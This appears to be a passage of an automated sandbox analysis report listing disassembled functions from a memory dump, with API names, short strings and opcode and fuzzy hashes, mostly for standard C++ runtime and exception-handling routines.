                                                                                                                                                            Function 00007FF8BA246510 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3741236498-0
                                                                                                                                                            • Opcode ID: a3a9ac9155885910c006026ec84d302a3fb3bbca8a327efe49f498bca1ce9a58
                                                                                                                                                            • Instruction ID: 9fb8692a660c2afc897510778c15629dfa6c30e92980ec4b299e639b9fd4b539
                                                                                                                                                            • Opcode Fuzzy Hash: a3a9ac9155885910c006026ec84d302a3fb3bbca8a327efe49f498bca1ce9a58
                                                                                                                                                            • Instruction Fuzzy Hash: F831D322B19B5680EF15DF2AA90456933A4FF08FD4B5946B5DF2D03384EE3DE442D300
                                                                                                                                                            Function 00007FF8BA243ACC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                            • Opcode ID: 94e1413139c6bbba30b8ad66f06ae2a05db38382e14bd46658f429fe585231f0
                                                                                                                                                            • Instruction ID: 7e0b6c5b8bf751816f4ce8623cf33d80bb092088be49218f6335ae37c156b7e9
                                                                                                                                                            • Opcode Fuzzy Hash: 94e1413139c6bbba30b8ad66f06ae2a05db38382e14bd46658f429fe585231f0
                                                                                                                                                            • Instruction Fuzzy Hash: 4E919073A08B828AE710CB69E4802AD7BA1FB44BC8F104169EF8D57B58DF3CD195DB00
                                                                                                                                                            Function 00007FF8BA24BE30 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                            • API String ID: 2943138195-757766384
                                                                                                                                                            • Opcode ID: 43b7f266c3171bbdf00817c5a63e2c7b70fa0b2a6d86be587c5b74d150470c25
                                                                                                                                                            • Instruction ID: 25002daf8a9ad8c9d50e8ec5897d330e989a5513791b007abfc87f47553bec23
                                                                                                                                                            • Opcode Fuzzy Hash: 43b7f266c3171bbdf00817c5a63e2c7b70fa0b2a6d86be587c5b74d150470c25
                                                                                                                                                            • Instruction Fuzzy Hash: B57156B6A08A4394EB148F2CDA510B866A5BF05BC4F8455B5DF4E42B98DF3EE160E300
                                                                                                                                                            Function 00007FF8BA2438B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                            • Opcode ID: 1b2764a8b34a61b78cb93bf783d995c710cf9a0488163cb67a3aa6f00ec1cb9a
                                                                                                                                                            • Instruction ID: f0144e236a2042cac494c940e3b04c741c48e2d20f7ca2921d5a78e922ee4d33
                                                                                                                                                            • Opcode Fuzzy Hash: 1b2764a8b34a61b78cb93bf783d995c710cf9a0488163cb67a3aa6f00ec1cb9a
                                                                                                                                                            • Instruction Fuzzy Hash: 0A611633A08B868AEB14DFA9D5803AD77A0FB44B98F144265EF4D17B98CF78E195D700
                                                                                                                                                            Function 00007FF8BA245760 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 132COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHeader
                                                                                                                                                            • String ID: MOC$RCC$csm$csm
                                                                                                                                                            • API String ID: 104395404-1441736206
                                                                                                                                                            • Opcode ID: b3a9615b6f4824218aa6ad8f5fddc369806036b28850a320f3657a553c48c11a
                                                                                                                                                            • Instruction ID: 18b9caaf3a84c080f779a9febabdf3f35910cbcc38c66f8675fa5dddee7b5cd5
                                                                                                                                                            • Opcode Fuzzy Hash: b3a9615b6f4824218aa6ad8f5fddc369806036b28850a320f3657a553c48c11a
                                                                                                                                                            • Instruction Fuzzy Hash: 9F517772A0961386EB619F29D14137D66A0FF88FD4F1440B2EF8D53789CF3CE881A641
                                                                                                                                                            Function 00007FF8BA24A234 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: NameName::$Name::operator+
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 826178784-0
                                                                                                                                                            • Opcode ID: e814d139e3419835f38085e6cc00be1678fdf65e944501138f1dd798dcc3f124
                                                                                                                                                            • Instruction ID: 64ab0c19d16cadb7820dbeba84a55cf4a002ba4624a9c8a6833745beddac54fe
                                                                                                                                                            • Opcode Fuzzy Hash: e814d139e3419835f38085e6cc00be1678fdf65e944501138f1dd798dcc3f124
                                                                                                                                                            • Instruction Fuzzy Hash: A1418B32A18B5794FB10CB2AD9901B837A4BB55FC0B9840B2EF5E17795EF39E845E300
                                                                                                                                                            Function 00007FF8BA244268 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA2443E7
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abort
                                                                                                                                                            • String ID: $csm$csm
                                                                                                                                                            • API String ID: 4206212132-1512788406
                                                                                                                                                            • Opcode ID: bb1235440ca836f75756ab82136ebef4cbca7055a8801f356a81cb2fbc572e69
                                                                                                                                                            • Instruction ID: 0fd6edcee69c39b493c1e22f464d1daa9d3ec07cc95e9a9ca08e100d9b847bb6
                                                                                                                                                            • Opcode Fuzzy Hash: bb1235440ca836f75756ab82136ebef4cbca7055a8801f356a81cb2fbc572e69
                                                                                                                                                            • Instruction Fuzzy Hash: 36718E7690869287DB648B29D0A06BDBBA0FB04FC9F148176DF4E47A89CF3CD591E740
                                                                                                                                                            Function 00007FF8BA24EF20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 451473138-629598281
                                                                                                                                                            • Opcode ID: 1ee30452dd9abf8fa75946a47cbff7eb02a6352aece6e019df933011e3a9f475
                                                                                                                                                            • Instruction ID: e742aba4665c46cc517799a2da2d63eb042cf643fb22369d1138a49a11bde028
                                                                                                                                                            • Opcode Fuzzy Hash: 1ee30452dd9abf8fa75946a47cbff7eb02a6352aece6e019df933011e3a9f475
                                                                                                                                                            • Instruction Fuzzy Hash: 4C51CF32A1960386EB14CB19E444A693B95FBC4FC8F119075DF0A47B88EF79ED49D700
                                                                                                                                                            Function 00007FF8BA244040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244137
                                                                                                                                                            • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BA244147
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 4108983575-3733052814
                                                                                                                                                            • Opcode ID: 11c4ce4d55e2cf51e2b9c0d4075d348971100c6bb06491b44300c400f97ac44e
                                                                                                                                                            • Instruction ID: 0848efb5bd209338e2106aca621ede95f5623d8ebc6ca767cb640a57508fbd9a
                                                                                                                                                            • Opcode Fuzzy Hash: 11c4ce4d55e2cf51e2b9c0d4075d348971100c6bb06491b44300c400f97ac44e
                                                                                                                                                            • Instruction Fuzzy Hash: 6D517B3690868387EF648B19945426876A0FB51FC8F1482B6DF9C47BD5CF3CE460EB00
                                                                                                                                                            Function 00007FF8BA24A9A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: NameName::
                                                                                                                                                            • String ID: %lf
                                                                                                                                                            • API String ID: 1333004437-2891890143
                                                                                                                                                            • Opcode ID: e3b031f8912d440425a8f2cdce867f88c91c5ffb8783136e582da0d9922c86a3
                                                                                                                                                            • Instruction ID: d1c1a86d4134fda8fa785afd7ec785b19332994d9d2e0f6cf83e2ba006ac9c71
                                                                                                                                                            • Opcode Fuzzy Hash: e3b031f8912d440425a8f2cdce867f88c91c5ffb8783136e582da0d9922c86a3
                                                                                                                                                            • Instruction Fuzzy Hash: 7B31B161A0CB9784FB159B2AA9510BA7360BF55FC0F0881B1EF9E47791DE3CF541A300
                                                                                                                                                            Function 00007FF8BA242610 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24264E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                                                            • API String ID: 661698970-2671469338
                                                                                                                                                            • Opcode ID: 7565ead2df15cda5b943c79179a3e7111ba46512fcdc4fe07fd8da32d148abe8
                                                                                                                                                            • Instruction ID: 454f45912e5565f7b1614199b3082be9d84b10ffb3676cbfc9f3d3027fcdbd95
                                                                                                                                                            • Opcode Fuzzy Hash: 7565ead2df15cda5b943c79179a3e7111ba46512fcdc4fe07fd8da32d148abe8
                                                                                                                                                            • Instruction Fuzzy Hash: F4F0493291864B82E7506B6AE38516836B4FB88FC4F0990B1DF4806252CF7CE4A0DB41
                                                                                                                                                            Function 00007FF8BA249F4C Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                            • Opcode ID: 0f5f8844eedabb5d2a213060cf870ce2f9b1e27baa25c1e31d45ad98a8e9470b
                                                                                                                                                            • Instruction ID: 3e4d2f8f780fc101eab739e0b7909077ca19c6040175abbca017e04573a0761e
                                                                                                                                                            • Opcode Fuzzy Hash: 0f5f8844eedabb5d2a213060cf870ce2f9b1e27baa25c1e31d45ad98a8e9470b
                                                                                                                                                            • Instruction Fuzzy Hash: 8F918962E18A9399FB118B69D8403BC3BB1BB04B88F5440B6DF4D1B699DF7DA845E340
                                                                                                                                                            Function 00007FF8BA24A6DC Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                            • Opcode ID: 83f0149d9abce5912b17f90b477895460167f4a14a80b287fad8d35e44d0740e
                                                                                                                                                            • Instruction ID: 84ae8515130534d2d59c895fe635d1077cd466522ef354ff87a83fd107a091f8
                                                                                                                                                            • Opcode Fuzzy Hash: 83f0149d9abce5912b17f90b477895460167f4a14a80b287fad8d35e44d0740e
                                                                                                                                                            • Instruction Fuzzy Hash: 6A512272E29A9689F7118F29E9807BC37A1FB44B88F5880B1DF0E06795DF39E441E740
                                                                                                                                                            Function 00007FF8BA24CB58 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3863519203-0
                                                                                                                                                            • Opcode ID: 67896261213bbb02e3105b7d5784891152933d5a0b6d20440f1dafc4c4e7fb5c
                                                                                                                                                            • Instruction ID: c4e732406a94818cce6465d6e864730141de2c9e6353619bab6ba5d3e63e53ed
                                                                                                                                                            • Opcode Fuzzy Hash: 67896261213bbb02e3105b7d5784891152933d5a0b6d20440f1dafc4c4e7fb5c
                                                                                                                                                            • Instruction Fuzzy Hash: 98413372A08B9689FB01CF68D8813AC37B0BB48B88F588065DF4D67799DF789441D750
                                                                                                                                                            Function 00007FF8BA244930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abort$CreateFrameInfo
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2697087660-1018135373
                                                                                                                                                            • Opcode ID: c18001ca279a1253989bed659394623426b9d84cd43b17a58d75ca1dfeac2340
                                                                                                                                                            • Instruction ID: 8852b5135a07a22a6a42156248a3e171eeb065bc819e61974b9d45e3f930e08b
                                                                                                                                                            • Opcode Fuzzy Hash: c18001ca279a1253989bed659394623426b9d84cd43b17a58d75ca1dfeac2340
                                                                                                                                                            • Instruction Fuzzy Hash: 72512932A1978687EA20AB2AE25026E77A4FB88FD4F140175DF8D07B55DF7CE461DB00
                                                                                                                                                            Function 00007FF8BA249E38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: void$void
                                                                                                                                                            • API String ID: 2943138195-3746155364
                                                                                                                                                            • Opcode ID: 6228d3c5b00791310a3d59bf63b272905c7049c14e93eaba0b6b545b38ebbb1a
                                                                                                                                                            • Instruction ID: 5a9a9a684d94460188f56a5baf96fa656286aad91cac67cfd5f8c257982a7b74
                                                                                                                                                            • Opcode Fuzzy Hash: 6228d3c5b00791310a3d59bf63b272905c7049c14e93eaba0b6b545b38ebbb1a
                                                                                                                                                            • Instruction Fuzzy Hash: CD310A62E28B5698FB11CBA8E8811FC37B0BB48B88F440576DF4E56B59DF3CA144D750
                                                                                                                                                            Function 00007FF8BA24628F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
